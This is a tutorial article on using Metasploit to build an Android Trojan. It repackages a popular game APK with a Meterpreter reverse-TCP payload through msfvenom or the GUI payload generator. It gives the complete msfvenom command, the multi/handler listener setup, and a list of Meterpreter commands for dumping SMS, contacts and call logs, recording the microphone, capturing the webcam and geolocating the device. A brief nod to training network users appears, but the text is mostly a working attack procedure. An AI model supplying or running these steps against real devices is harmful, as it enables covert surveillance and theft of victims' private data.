Metasploit: Android Session In previous articles, I have covered how to access a Windows system as well as a Linux system. What if you wanted to gain access to the widest available Operating System (OS)? In this article, I will cover the process of gaining access to an Android system, which includes tablets and phones. Similar to the Linux Session article, this article will cover creating a Trojan to gain access to an Android system. First, I will go over how to create the Trojan and secondly discuss how to get the Trojan onto the Android systems. For Network Administrators, you can learn how this process works and train your network users how to avoid getting Trojans. The result of getting a Trojan on an Android system is that others can gain access to your device. For phones, access allows the downloading of your contact list, text messages and a listing of phone calls sent and received. To start, you need an existing Android Application Package (APK). Find one which seems to be popular and definitely requires network access. Usually, a game which accesses a server works fine, but not needed. Get the APK file and download it to your system. For this example, I will use “Angry Birds Rio”. APK files can be downloaded from www.apk4fun.com and saved to your PC. Save the APK file in a folder easily accessible. In my example, I saved it to my Desktop (/home/jarret/Desktop/). The command to run is “msfvenom -a dalvik --platform android -p android/meterpreter/reverse_tcp LHOST=192.168.2.201 LPORT=3333 -x /home/jarret/Desktop/Angry\ Birds\ Rio\ apkfiles.com.apk R -o /home/jarret/Desktop/Angry\ Birds\ Rio\ apkfiles.com-Out.apk”. Let's go over the parameters so you understand how it works. The options are as follows: -a – architecture of the system for the file being created (depends on platform) sparc x86 x86_64 armle cbea cbea64 dalvik java mipsbe mipsle ppc ppc64 cmd tty x64 --platform – platform of the target system -p – payload to use against the target AIX Android BSD BSDi Firefox Java Linux Netware NodeJS OSX PHP Python Ruby Solaris UNIX Windows -x – template to use -o – output folder and file R – format of the output file (raw) NOTE: Be sure to set the LHOST and LPORT correctly. The LHOST IP Address is the system on which Meterpreter will be running and listening for the Android device. The LPORT is the specific port on which the device will be querying the LHOST. Keep special note of these to make sure the values are used later. Once the command completes, you should have a new APK file. Now, you need to get the APK file to the user of the Android device to be placed onto the device. Once the APK file is installed and run, the Meterpreter system should be listening. NOTE: Be aware that a virus scanner such as Avira can detect the Trojan APK file. Before moving on to starting Metasploit, let's look at another method of creating the Trojan in a Graphical User Interface (GUI). Open your browser and connect to the Meterpreter system and the port specified during installation. The default port is 3790. On my system, I connect to https://192.168.2.201:3709/ and log in using the account created when Metasploit was installed. Once logged in, I can choose the icon for “Payload Generator” as shown in Figure 1. FIGURE 1 When the “Payload Generator” starts, select “Classic Payload” at the top of the window. Specify the “Platform” as Android and notice that the “Architecure” option disappears. The platform for Android is Dalvik and is not needed since it is the only option. The “Stager” is set up as “reverse_tcp” with the stage set as “android/meterpreter”. Set your LHOST and LPORT for the meterpreter session as needed. The options are shown in Figure 2. FIGURE 2 Next, select the “Output Options” and set the type of output to “Raw Bytes” as shown in Figure 3. The APK file is not an executable file, but a compressed file with installation instructions similar to a “.deb” or “.rpm” file. Click “Generate” so the file can be created and then you can “download” the file and specify where to save it. Now, you need to get it onto the Android device and installed on it. FIGURE 3 To start Meterpreter listening for the “infected” systems, perform the following: use exploit/multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST 192.168.2.201 set LHOST 3333 exploit NOTE: Since the initial exploit being loaded is “multi”, it means that Metasploit will listen for responses from any system or device. The Operating System (OS) can be of any available type. The type of OS is not limited to a single OS, but any OS contacting the LHOST. Metasploit should now be listening for a response from any Trojans that become active. Once the Target Host has created the session back to Metasploit, you can then start accessing the Android device. The available commands which can be used in Meterpreter are as follows: Core Commands ============= ? - Help menu background - Backgrounds the current session bgkill - Kills a background meterpreter script bglist - Lists running background scripts bgrun - Executes a meterpreter script as a background thread channel - Displays information about active channels close - Closes a channel disable_unicode_encoding - Disables encoding of unicode strings enable_unicode_encoding - Enables encoding of unicode strings exit - Terminate the meterpreter session get_timeouts - Get the current session timeout values help - Help menu info - Displays information about a Post module interact - Interacts with a channel irb - Drop into irb scripting mode load - Load one or more meterpreter extensions machine_id - Get the MSF ID of the machine attached to the session quit - Terminate the meterpreter session read - Reads data from a channel resource - Run the commands stored in a file run - Executes a meterpreter script or Post module set_timeouts - Set the current session timeout values sleep - Force Meterpreter to go quiet, then re-establish session. Transport - Change the current transport mechanism use - Deprecated alias for 'load' uuid - Get the UUID for the current session write - Writes data to a channel Stdapi: File system Commands ============================ cat - Read the contents of a file to the screen cd - Change directory download - Download a file or directory edit - Edit a file getlwd - Print local working directory getwd - Print working directory lcd - Change local working directory lpwd - Print local working directory ls - List files mkdir - Make directory pwd - Print working directory rm - Delete the specified file rmdir - Remove directory search - Search for files upload - Upload a file or directory Stdapi: Networking Commands =========================== ifconfig - Display interfaces portfwd - Forward a local port to a remote service route - View and modify the routing table Stdapi: System Commands ====================== execute - Execute a command getuid - Get the user that the server is running as ps - List running processes shell - Drop into a system command shell sysinfo - Gets information about the remote system, such as OS Stdapi: Webcam Commands ======================= record_mic - Record audio from the default microphone for X seconds webcam_chat - Start a video chat webcam_list - List webcams webcam_snap - Take a snapshot from the specified webcam webcam_stream - Play a video stream from the specified webcam Android Commands ================ check_root - Check if device is rooted dump_calllog - Get call log dump_contacts - Get contacts list dump_sms - Get sms messages geolocate - Get current lat-long using geolocation Depending on the Android Device, some commands may not work. Try this out on an Android Device and see how simple it is to attack an Android Device and get data from the device. NOTE: To find the Trojan app on the device, look for the installed program called “MainActivity” and uninstall it.